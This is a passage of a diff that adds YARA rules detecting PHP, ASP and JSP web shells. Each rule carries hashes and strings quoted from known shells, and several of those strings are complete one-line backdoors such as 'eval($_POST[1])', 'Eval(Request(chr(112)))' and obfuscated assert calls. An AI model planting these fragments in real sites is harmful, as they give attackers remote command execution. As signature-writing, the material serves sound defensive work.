+		score = 70
+		super_rule = 1
+		hash0 = "61a92ce63369e2fa4919ef0ff7c51167"
+		hash1 = "d3f38a6dc54a73d304932d9227a739ec"
+		hash2 = "157b4ac3c7ba3a36e546e81e9279eab5"
+		hash3 = "048ccc01b873b40d57ce25a4c56ea717"
+	strings:
+		$s2 = "$bindport_pass = \"c99\";" fullword
+		$s5 = " else {echo \"<b>Execution PHP-code</b>\"; if (empty($eval_txt)) {$eval_txt = tr"
+	condition:
+		1 of them
+}
+rule webshell_r57shell127_r57_iFX_r57_kartal_r57_antichat {
+	meta:
+		description = "Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "ae025c886fbe7f9ed159f49593674832"
+		hash1 = "513b7be8bd0595c377283a7c87b44b2e"
+		hash2 = "1d912c55b96e2efe8ca873d6040e3b30"
+		hash3 = "4108f28a9792b50d95f95b9e5314fa1e"
+		hash4 = "3f71175985848ee46cc13282fbed2269"
+	strings:
+		$s6 = "$res   = @mysql_query(\"SHOW CREATE TABLE `\".$_POST['mysql_tbl'].\"`\", $d"
+		$s7 = "$sql1 .= $row[1].\"\\r\\n\\r\\n\";" fullword
+		$s8 = "if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }" fullword
+		$s9 = "foreach($values as $k=>$v) {$values[$k] = addslashes($v);}" fullword
+	condition:
+		2 of them
+}
+rule webshell_NIX_REMOTE_WEB_SHELL_nstview_xxx {
+	meta:
+		description = "Web Shell - from files NIX REMOTE WEB-SHELL.php, nstview.php, NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php, Cyber Shell (v 1.0).php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "0b19e9de790cd2f4325f8c24b22af540"
+		hash1 = "4745d510fed4378e4b1730f56f25e569"
+		hash2 = "f3ca29b7999643507081caab926e2e74"
+		hash3 = "46a18979750fa458a04343cf58faa9bd"
+	strings:
+		$s3 = "BODY, TD, TR {" fullword
+		$s5 = "$d=str_replace(\"\\\\\",\"/\",$d);" fullword
+		$s6 = "if ($file==\".\" || $file==\"..\") continue;" fullword
+	condition:
+		2 of them
+}
+rule webshell_000_403_807_a_c5_config_css_dm_he1p_xxx {
+	meta:
+		description = "Web Shell - from files 000.jsp, 403.jsp, 807.jsp, a.jsp, c5.jsp, config.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, myxx.jsp, nogfw.jsp, ok.jsp, queryDong.jsp, spyjsp2010.jsp, style.jsp, u.jsp, xia.jsp, zend.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
+		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
+		hash2 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
+		hash3 = "76037ebd781ad0eac363d56fc81f4b4f"
+		hash4 = "8b457934da3821ba58b06a113e0d53d9"
+		hash5 = "d44df8b1543b837e57cc8f25a0a68d92"
+		hash6 = "fc44f6b4387a2cb50e1a63c66a8cb81c"
+		hash7 = "14e9688c86b454ed48171a9d4f48ace8"
+		hash8 = "b330a6c2d49124ef0729539761d6ef0b"
+		hash9 = "d71716df5042880ef84427acee8b121e"
+		hash10 = "341298482cf90febebb8616426080d1d"
+		hash11 = "29aebe333d6332f0ebc2258def94d57e"
+		hash12 = "42654af68e5d4ea217e6ece5389eb302"
+		hash13 = "88fc87e7c58249a398efd5ceae636073"
+		hash14 = "4a812678308475c64132a9b56254edbc"
+		hash15 = "9626eef1a8b9b8d773a3b2af09306a10"
+		hash16 = "e0354099bee243702eb11df8d0e046df"
+		hash17 = "344f9073576a066142b2023629539ebd"
+		hash18 = "32dea47d9c13f9000c4c807561341bee"
+		hash19 = "90a5ba0c94199269ba33a58bc6a4ad99"
+		hash20 = "655722eaa6c646437c8ae93daac46ae0"
+		hash21 = "b9744f6876919c46a29ea05b1d95b1c3"
+		hash22 = "6acc82544be056580c3a1caaa4999956"
+		hash23 = "6aa32a6392840e161a018f3907a86968"
+		hash24 = "591ca89a25f06cf01e4345f98a22845c"
+		hash25 = "349ec229e3f8eda0f9eb918c74a8bf4c"
+		hash26 = "3ea688e3439a1f56b16694667938316d"
+		hash27 = "ab77e4d1006259d7cbc15884416ca88c"
+		hash28 = "71097537a91fac6b01f46f66ee2d7749"
+		hash29 = "2434a7a07cb47ce25b41d30bc291cacc"
+		hash30 = "7a4b090619ecce6f7bd838fe5c58554b"
+	strings:
+		$s3 = "String savePath = request.getParameter(\"savepath\");" fullword
+		$s4 = "URL downUrl = new URL(downFileUrl);" fullword
+		$s5 = "if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath))" fullword
+		$s6 = "String downFileUrl = request.getParameter(\"url\");" fullword
+		$s7 = "FileInputStream fInput = new FileInputStream(f);" fullword
+		$s8 = "URLConnection conn = downUrl.openConnection();" fullword
+		$s9 = "sis = request.getInputStream();" fullword
+	condition:
+		4 of them
+}
+rule webshell_2_520_icesword_job_ma1 {
+	meta:
+		description = "Web Shell - from files 2.jsp, 520.jsp, icesword.jsp, job.jsp, ma1.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "64a3bf9142b045b9062b204db39d4d57"
+		hash1 = "9abd397c6498c41967b4dd327cf8b55a"
+		hash2 = "077f4b1b6d705d223b6d644a4f3eebae"
+		hash3 = "56c005690da2558690c4aa305a31ad37"
+		hash4 = "532b93e02cddfbb548ce5938fe2f5559"
+	strings:
+		$s1 = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=gb2312\"></head>" fullword
+		$s3 = "<input type=\"hidden\" name=\"_EVENTTARGET\" value=\"\" />" fullword
+		$s8 = "<input type=\"hidden\" name=\"_EVENTARGUMENT\" value=\"\" />" fullword
+	condition:
+		2 of them
+}
+rule webshell_404_data_in_JFolder_jfolder01_jsp_suiyue_warn {
+	meta:
+		description = "Web Shell - from files 404.jsp, data.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, suiyue.jsp, warn.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "7066f4469c3ec20f4890535b5f299122"
+		hash1 = "9f54aa7b43797be9bab7d094f238b4ff"
+		hash2 = "793b3d0a740dbf355df3e6f68b8217a4"
+		hash3 = "8979594423b68489024447474d113894"
+		hash4 = "ec482fc969d182e5440521c913bab9bd"
+		hash5 = "f98d2b33cd777e160d1489afed96de39"
+		hash6 = "c93d5bdf5cf62fe22e299d0f2b865ea7"
+		hash7 = "e9a5280f77537e23da2545306f6a19ad"
+	strings:
+		$s0 = "<table width=\"100%\" border=\"1\" cellspacing=\"0\" cellpadding=\"5\" bordercol"
+		$s2 = " KB </td>" fullword
+		$s3 = "<table width=\"98%\" border=\"0\" cellspacing=\"0\" cellpadding=\""
+		$s4 = "<!-- <tr align=\"center\"> " fullword
+	condition:
+		all of them
+}
+
+rule webshell_phpspy_2005_full_phpspy_2005_lite_phpspy_2006_PHPSPY {
+	meta:
+		description = "Web Shell - from files phpspy_2005_full.php, phpspy_2005_lite.php, phpspy_2006.php, PHPSPY.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "b68bfafc6059fd26732fa07fb6f7f640"
+		hash1 = "42f211cec8032eb0881e87ebdb3d7224"
+		hash2 = "40a1f840111996ff7200d18968e42cfe"
+		hash3 = "0712e3dc262b4e1f98ed25760b206836"
+	strings:
+		$s4 = "http://www.4ngel.net" fullword
+		$s5 = "</a> | <a href=\"?action=phpenv\">PHP" fullword
+		$s8 = "echo $msg=@fwrite($fp,$_POST['filecontent']) ? \"" fullword
+		$s9 = "Codz by Angel" fullword
+	condition:
+		2 of them
+}
+rule webshell_c99_locus7s_c99_w4cking_xxx {
+	meta:
+		description = "Web Shell - from files c99_locus7s.php, c99_w4cking.php, r57shell.php, r57shell127.php, SnIpEr_SA Shell.php, EgY_SpIdEr ShElL V2.php, r57_iFX.php, r57_kartal.php, r57_Mohajer22.php, r57.php, acid.php, newsh.php, r57.php, Backdoor.PHP.Agent.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "38fd7e45f9c11a37463c3ded1c76af4c"
+		hash1 = "9c34adbc8fd8d908cbb341734830f971"
+		hash2 = "ef43fef943e9df90ddb6257950b3538f"
+		hash3 = "ae025c886fbe7f9ed159f49593674832"
+		hash4 = "911195a9b7c010f61b66439d9048f400"
+		hash5 = "697dae78c040150daff7db751fc0c03c"
+		hash6 = "513b7be8bd0595c377283a7c87b44b2e"
+		hash7 = "1d912c55b96e2efe8ca873d6040e3b30"
+		hash8 = "e5b2131dd1db0dbdb43b53c5ce99016a"
+		hash9 = "4108f28a9792b50d95f95b9e5314fa1e"
+		hash10 = "b8f261a3cdf23398d573aaf55eaf63b5"
+		hash11 = "0d2c2c151ed839e6bafc7aa9c69be715"
+		hash12 = "41af6fd253648885c7ad2ed524e0692d"
+		hash13 = "6fcc283470465eed4870bcc3e2d7f14d"
+	strings:
+		$s1 = "$res = @shell_exec($cfe);" fullword
+		$s8 = "$res = @ob_get_contents();" fullword
+		$s9 = "@exec($cfe,$res);" fullword
+	condition:
+		2 of them
+}
+rule webshell_browser_201_3_ma_ma2_download {
+	meta:
+		description = "Web Shell - from files browser.jsp, 201.jsp, 3.jsp, ma.jsp, ma2.jsp, download.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "37603e44ee6dc1c359feb68a0d566f76"
+		hash1 = "a7e25b8ac605753ed0c438db93f6c498"
+		hash2 = "fb8c6c3a69b93e5e7193036fd31a958d"
+		hash3 = "4cc68fa572e88b669bce606c7ace0ae9"
+		hash4 = "4b45715fa3fa5473640e17f49ef5513d"
+		hash5 = "fa87bbd7201021c1aefee6fcc5b8e25a"
+	strings:
+		$s1 = "private static final int EDITFIELD_ROWS = 30;" fullword
+		$s2 = "private static String tempdir = \".\";" fullword
+		$s6 = "<input type=\"hidden\" name=\"dir\" value=\"<%=request.getAttribute(\"dir\")%>\""
+	condition:
+		2 of them
+}
+rule webshell_000_403_c5_queryDong_spyjsp2010 {
+	meta:
+		description = "Web Shell - from files 000.jsp, 403.jsp, c5.jsp, queryDong.jsp, spyjsp2010.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
+		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
+		hash2 = "8b457934da3821ba58b06a113e0d53d9"
+		hash3 = "90a5ba0c94199269ba33a58bc6a4ad99"
+		hash4 = "655722eaa6c646437c8ae93daac46ae0"
+	strings:
+		$s2 = "\" <select name='encode' class='input'><option value=''>ANSI</option><option val"
+		$s7 = "JSession.setAttribute(\"MSG\",\"<span style='color:red'>Upload File Failed!</spa"
+		$s8 = "File f = new File(JSession.getAttribute(CURRENT_DIR)+\"/\"+fileBean.getFileName("
+		$s9 = "((Invoker)ins.get(\"vd\")).invoke(request,response,JSession);" fullword
+	condition:
+		2 of them
+}
+rule webshell_r57shell127_r57_kartal_r57 {
+	meta:
+		description = "Web Shell - from files r57shell127.php, r57_kartal.php, r57.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "ae025c886fbe7f9ed159f49593674832"
+		hash1 = "1d912c55b96e2efe8ca873d6040e3b30"
+		hash2 = "4108f28a9792b50d95f95b9e5314fa1e"
+	strings:
+		$s2 = "$handle = @opendir($dir) or die(\"Can't open directory $dir\");" fullword
+		$s3 = "if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); }" fullword
+		$s5 = "if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_"
+	condition:
+		2 of them
+}
+
+rule webshell_webshells_new_con2 {
+	meta:
+		description = "Web shells - generated from file con2.asp"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "d3584159ab299d546bd77c9654932ae3"
+	strings:
+		$s7 = ",htaPrewoP(ecalper=htaPrewoP:fI dnE:0=KOtidE:1 - eulaVtni = eulaVtni:nehT 1 => e"
+		$s10 = "j \"<Form action='\"&URL&\"?Action2=Post' method='post' name='EditForm'><input n"
+	condition:
+		1 of them
+}
+rule webshell_webshells_new_make2 {
+	meta:
+		description = "Web shells - generated from file make2.php"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		hash = "9af195491101e0816a263c106e4c145e"
+		score = 50
+	strings:
+		$s1 = "error_reporting(0);session_start();header(\"Content-type:text/html;charset=utf-8"
+	condition:
+		all of them
+}
+rule webshell_webshells_new_aaa {
+	meta:
+		description = "Web shells - generated from file aaa.asp"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "68483788ab171a155db5266310c852b2"
+	strings:
+		$s0 = "Function fvm(jwv):If jwv=\"\"Then:fvm=jwv:Exit Function:End If:Dim tt,sru:tt=\""
+		$s5 = "<option value=\"\"DROP TABLE [jnc];exec mast\"&kvp&\"er..xp_regwrite 'HKEY_LOCAL"
+		$s17 = "if qpv=\"\" then qpv=\"x:\\Program Files\\MySQL\\MySQL Server 5.0\\my.ini\"&br&"
+	condition:
+		1 of them
+}
+rule webshell_Expdoor_com_ASP {
+	meta:
+		description = "Web shells - generated from file Expdoor.com ASP.asp"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "caef01bb8906d909f24d1fa109ea18a7"
+	strings:
+		$s4 = "\">www.Expdoor.com</a>" fullword
+		$s5 = "    <input name=\"FileName\" type=\"text\" value=\"Asp_ver.Asp\" size=\"20\" max"
+		$s10 = "set file=fs.OpenTextFile(server.MapPath(FileName),8,True)  '" fullword
+		$s14 = "set fs=server.CreateObject(\"Scripting.FileSystemObject\")   '" fullword
+		$s16 = "<TITLE>Expdoor.com ASP" fullword
+	condition:
+		2 of them
+}
+rule webshell_webshells_new_php2 {
+	meta:
+		description = "Web shells - generated from file php2.php"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "fbf2e76e6f897f6f42b896c855069276"
+	strings:
+		$s0 = "<?php $s=@$_GET[2];if(md5($s.$s)=="
+	condition:
+		all of them
+}
+rule webshell_bypass_iisuser_p {
+	meta:
+		description = "Web shells - generated from file bypass-iisuser-p.asp"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "924d294400a64fa888a79316fb3ccd90"
+	strings:
+		$s0 = "<%Eval(Request(chr(112))):Set fso=CreateObject"
+	condition:
+		all of them
+}
+rule webshell_sig_404super {
+	meta:
+		description = "Web shells - generated from file 404super.php"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "7ed63176226f83d36dce47ce82507b28"
+	strings:
+		$s4 = "$i = pack('c*', 0x70, 0x61, 99, 107);" fullword
+		$s6 = "    'h' => $i('H*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f7631')," fullword
+		$s7 = "//http://require.duapp.com/session.php" fullword
+		$s8 = "if(!isset($_SESSION['t'])){$_SESSION['t'] = $GLOBALS['f']($GLOBALS['h']);}" fullword
+		$s12 = "//define('pass','123456');" fullword
+		$s13 = "$GLOBALS['c']($GLOBALS['e'](null, $GLOBALS['s']('%s',$GLOBALS['p']('H*',$_SESSIO"
+	condition:
+		1 of them
+}
+rule webshell_webshells_new_JSP {
+	meta:
+		description = "Web shells - generated from file JSP.jsp"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "495f1a0a4c82f986f4bdf51ae1898ee7"
+	strings:
+		$s1 = "void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i"
+		$s5 = "bw.write(z2);bw.close();sb.append(\"1\");}else if(Z.equals(\"E\")){EE(z1);sb.app"
+		$s11 = "if(Z.equals(\"A\")){String s=new File(application.getRealPath(request.getRequest"
+	condition:
+		1 of them
+}
+rule webshell_webshell_123 {
+	meta:
+		description = "Web shells - generated from file webshell-123.php"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "2782bb170acaed3829ea9a04f0ac7218"
+	strings:
+		$s0 = "// Web Shell!!" fullword
+		$s1 = "@preg_replace(\"/.*/e\",\"\\x65\\x76\\x61\\x6C\\x28\\x67\\x7A\\x69\\x6E\\x66\\x6"
+		$s3 = "$default_charset = \"UTF-8\";" fullword
+		$s4 = "// url:http://www.weigongkai.com/shell/" fullword
+	condition:
+		2 of them
+}
+rule webshell_dev_core {
+	meta:
+		description = "Web shells - generated from file dev_core.php"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "55ad9309b006884f660c41e53150fc2e"
+	strings:
+		$s1 = "if (strpos($_SERVER['HTTP_USER_AGENT'], 'EBSD') == false) {" fullword
+		$s9 = "setcookie('key', $_POST['pwd'], time() + 3600 * 24 * 30);" fullword
+		$s10 = "$_SESSION['code'] = _REQUEST(sprintf(\"%s?%s\",pack(\"H*\",'6874"
+		$s11 = "if (preg_match(\"/^HTTP\\/\\d\\.\\d\\s([\\d]+)\\s.*$/\", $status, $matches))"
+		$s12 = "eval(gzuncompress(gzuncompress(Crypt::decrypt($_SESSION['code'], $_C"
+		$s15 = "if (($fsock = fsockopen($url2['host'], 80, $errno, $errstr, $fsock_timeout))"
+	condition:
+		1 of them
+}
+rule webshell_webshells_new_pHp {
+	meta:
+		description = "Web shells - generated from file pHp.php"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "b0e842bdf83396c3ef8c71ff94e64167"
+	strings:
+		$s0 = "if(is_readable($path)) antivirus($path.'/',$exs,$matches);" fullword
+		$s1 = "'/(eval|assert|include|require|include\\_once|require\\_once|array\\_map|arr"
+		$s13 = "'/(exec|shell\\_exec|system|passthru)+\\s*\\(\\s*\\$\\_(\\w+)\\[(.*)\\]\\s*"
+		$s14 = "'/(include|require|include\\_once|require\\_once)+\\s*\\(\\s*[\\'|\\\"](\\w+"
+		$s19 = "'/\\$\\_(\\w+)(.*)(eval|assert|include|require|include\\_once|require\\_once"
+	condition:
+		1 of them
+}
+rule webshell_webshells_new_pppp {
+	meta:
+		description = "Web shells - generated from file pppp.php"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "cf01cb6e09ee594545693c5d327bdd50"
+	strings:
+		$s0 = "Mail: chinese@hackermail.com" fullword
+		$s3 = "if($_GET[\"hackers\"]==\"2b\"){if ($_SERVER['REQUEST_METHOD'] == 'POST') { echo "
+		$s6 = "Site: http://blog.weili.me" fullword
+	condition:
+		1 of them
+}
+rule webshell_webshells_new_code {
+	meta:
+		description = "Web shells - generated from file code.php"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "a444014c134ff24c0be5a05c02b81a79"
+	strings:
+		$s1 = "<a class=\"high2\" href=\"javascript:;;;\" name=\"action=show&dir=$_ipage_fi"
+		$s7 = "$file = !empty($_POST[\"dir\"]) ? urldecode(self::convert_to_utf8(rtrim($_PO"
+		$s10 = "if (true==@move_uploaded_file($_FILES['userfile']['tmp_name'],self::convert_"
+		$s14 = "Processed in <span id=\"runtime\"></span> second(s) {gzip} usage:"
+		$s17 = "<a href=\"javascript:;;;\" name=\"{return_link}\" onclick=\"fileperm"
+	condition:
+		1 of them
+}
+rule webshell_webshells_new_jspyyy {
+	meta:
+		description = "Web shells - generated from file jspyyy.jsp"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "b291bf3ccc9dac8b5c7e1739b8fa742e"
+	strings:
+		$s0 = "<%@page import=\"java.io.*\"%><%if(request.getParameter(\"f\")"
+	condition:
+		all of them
+}
+rule webshell_webshells_new_xxxx {
+	meta:
+		description = "Web shells - generated from file xxxx.php"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "5bcba70b2137375225d8eedcde2c0ebb"
+	strings:
+		$s0 = "<?php eval($_POST[1]);?>  " fullword
+	condition:
+		all of them
+}
+rule webshell_webshells_new_JJjsp3 {
+	meta:
+		description = "Web shells - generated from file JJjsp3.jsp"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "949ffee1e07a1269df7c69b9722d293e"
+	strings:
+		$s0 = "<%@page import=\"java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*\"%><%!S"
+	condition:
+		all of them
+}
+rule webshell_webshells_new_PHP1 {
+	meta:
+		description = "Web shells - generated from file PHP1.php"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "14c7281fdaf2ae004ca5fec8753ce3cb"
+	strings:
+		$s0 = "<[url=mailto:?@array_map($_GET[]?@array_map($_GET['f'],$_GET[/url]);?>" fullword
+		$s2 = ":https://forum.90sec.org/forum.php?mod=viewthread&tid=7316" fullword
+		$s3 = "@preg_replace(\"/f/e\",$_GET['u'],\"fengjiao\"); " fullword
+	condition:
+		1 of them
+}
+rule webshell_webshells_new_JJJsp2 {
+	meta:
+		description = "Web shells - generated from file JJJsp2.jsp"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "5a9fec45236768069c99f0bfd566d754"
+	strings:
+		$s2 = "QQ(cs, z1, z2, sb,z2.indexOf(\"-to:\")!=-1?z2.substring(z2.indexOf(\"-to:\")+4,z"
+		$s8 = "sb.append(l[i].getName() + \"/\\t\" + sT + \"\\t\" + l[i].length()+ \"\\t\" + sQ"
+		$s10 = "ResultSet r = s.indexOf(\"jdbc:oracle\")!=-1?c.getMetaData()"
+		$s11 = "return DriverManager.getConnection(x[1].trim()+\":\"+x[4],x[2].equalsIgnoreCase("
+	condition:
+		1 of them
+}
+rule webshell_webshells_new_radhat {
+	meta:
+		description = "Web shells - generated from file radhat.asp"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "72cb5ef226834ed791144abaa0acdfd4"
+	strings:
+		$s1 = "sod=Array(\"D\",\"7\",\"S"
+	condition:
+		all of them
+}
+rule webshell_webshells_new_asp1 {
+	meta:
+		description = "Web shells - generated from file asp1.asp"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "b63e708cd58ae1ec85cf784060b69cad"
+	strings:
+		$s0 = " http://www.baidu.com/fuck.asp?a=)0(tseuqer%20lave " fullword
+		$s2 = " <% a=request(chr(97)) ExecuteGlobal(StrReverse(a)) %>" fullword
+	condition:
+		1 of them
+}
+rule webshell_webshells_new_php6 {
+	meta:
+		description = "Web shells - generated from file php6.php"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "ea75280224a735f1e445d244acdfeb7b"
+	strings:
+		$s1 = "array_map(\"asx73ert\",(ar"
+		$s3 = "preg_replace(\"/[errorpage]/e\",$page,\"saft\");" fullword
+		$s4 = "shell.php?qid=zxexp  " fullword
+	condition:
+		1 of them
+}
+rule webshell_webshells_new_xxx {
+	meta:
+		description = "Web shells - generated from file xxx.php"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "0e71428fe68b39b70adb6aeedf260ca0"
+	strings:
+		$s3 = "<?php array_map(\"ass\\x65rt\",(array)$_REQUEST['expdoor']);?>" fullword
+	condition:
+		all of them
+}
+rule webshell_GetPostpHp {
+	meta:
+		description = "Web shells - generated from file GetPostpHp.php"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "20ede5b8182d952728d594e6f2bb5c76"
+	strings:
+		$s0 = "<?php eval(str_rot13('riny($_CBFG[cntr]);'));?>" fullword
+	condition:
+		all of them
+}
+rule webshell_webshells_new_php5 {
+	meta:
+		description = "Web shells - generated from file php5.php"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "cf2ab009cbd2576a806bfefb74906fdf"
+	strings:
+		$s0 = "<?$_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_u"
+	condition:
+		all of them
+}
+rule webshell_webshells_new_PHP {
+	meta:
+		description = "Web shells - generated from file PHP.php"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "a524e7ae8d71e37d2fd3e5fbdab405ea"
+	strings:
+		$s1 = "echo \"<font color=blue>Error!</font>\";" fullword
+		$s2 = "<input type=\"text\" size=61 name=\"f\" value='<?php echo $_SERVER[\"SCRIPT_FILE"
+		$s5 = " - ExpDoor.com</title>" fullword
+		$s10 = "$f=fopen($_POST[\"f\"],\"w\");" fullword
+		$s12 = "<textarea name=\"c\" cols=60 rows=15></textarea><br>" fullword
+	condition:
+		1 of them
+}
+rule webshell_webshells_new_Asp {
+	meta:
+		description = "Web shells - generated from file Asp.asp"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "32c87744ea404d0ea0debd55915010b7"
+	strings:
+		$s1 = "Execute MorfiCoder(\")/*/z/*/(tseuqer lave\")" fullword
+		$s2 = "Function MorfiCoder(Code)" fullword
+		$s3 = "MorfiCoder=Replace(Replace(StrReverse(Code),\"/*/\",\"\"\"\"),\"\\*\\\",vbCrlf)" fullword
+	condition:
+		1 of them
+}
+
+
+rule WebShell_cgi {
+	meta:
+		description = "Semi-Auto-generated  - file WebShell.cgi.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "bc486c2e00b5fc3e4e783557a2441e6f"
+	strings:
+		$s0 = "WebShell.cgi"
+		$s2 = "<td><code class=\"entry-[% if entry.all_rights %]mine[% else"
+	condition:
+		all of them
+}
+rule WinX_Shell_html {
+	meta:
+		description = "Semi-Auto-generated  - file WinX Shell.html.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "17ab5086aef89d4951fe9b7c7a561dda"
+	strings:
+		$s0 = "WinX Shell"
+		$s1 = "Created by greenwood from n57"
+		$s2 = "<td><font color=\\\"#990000\\\">Win Dir:</font></td>"
+	condition:
+		2 of them
+}
+
+
+rule Dx_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file Dx.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "9cfe372d49fe8bf2fac8e1c534153d9b"
+	strings:
+		$s0 = "print \"\\n\".'Tip: to view the file \"as is\" - open the page in <a href=\"'.Dx"
+		$s2 = "$DEF_PORTS=array (1=>'tcpmux (TCP Port Service Multiplexer)',2=>'Management Util"
+		$s3 = "$ra44  = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_SERVER['HTTP"
+	condition:
+		1 of them
+}
+rule csh_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file csh.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "194a9d3f3eac8bc56d9a7c55c016af96"
+	strings:
+		$s0 = ".::[c0derz]::. web-shell"
+		$s1 = "http://c0derz.org.ua"
+		$s2 = "vint21h@c0derz.org.ua"
+		$s3 = "$name='63a9f0ea7bb98050796b649e85481845';//root"
+	condition:
+		1 of them
+}
+rule pHpINJ_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file pHpINJ.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "d7a4b0df45d34888d5a09f745e85733f"
+	strings:
+		$s1 = "News Remote PHP Shell Injection" 
+		$s3 = "Php Shell <br />" fullword
+		$s4 = "<input type = \"text\" name = \"url\" value = \""
+	condition:
+		2 of them
+}
+rule sig_2008_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file 2008.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "3e4ba470d4c38765e4b16ed930facf2c"
+	strings:
+		$s0 = "Codz by angel(4ngel)"
+		$s1 = "Web: http://www.4ngel.net"
+		$s2 = "$admin['cookielife'] = 86400;"
+		$s3 = "$errmsg = 'The file you want Downloadable was nonexistent';"
+	condition:
+		1 of them
+}
+rule ak74shell_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file ak74shell.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "7f83adcb4c1111653d30c6427a94f66f"
+	strings:
+		$s1 = "$res .= '<td align=\"center\"><a href=\"'.$xshell.'?act=chmod&file='.$_SESSION["
+		$s2 = "AK-74 Security Team Web Site: www.ak74-team.net"
+		$s3 = "$xshell"
+	condition:
+		2 of them
+}
+rule Rem_View_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file Rem View.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "29420106d9a81553ef0d1ca72b9934d9"
+	strings:
+		$s0 = "$php=\"/* line 1 */\\n\\n// \".mm(\"for example, uncomment next line\").\""
+		$s2 = "<input type=submit value='\".mm(\"Delete all dir/files recursive\").\" (rm -fr)'"
+		$s4 ="Welcome to phpRemoteView (RemView)"
+	condition:
+		1 of them
+}
+rule Java_Shell_js {
+	meta:
+		description = "Semi-Auto-generated  - file Java Shell.js.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "36403bc776eb12e8b7cc0eb47c8aac83"
+	strings:
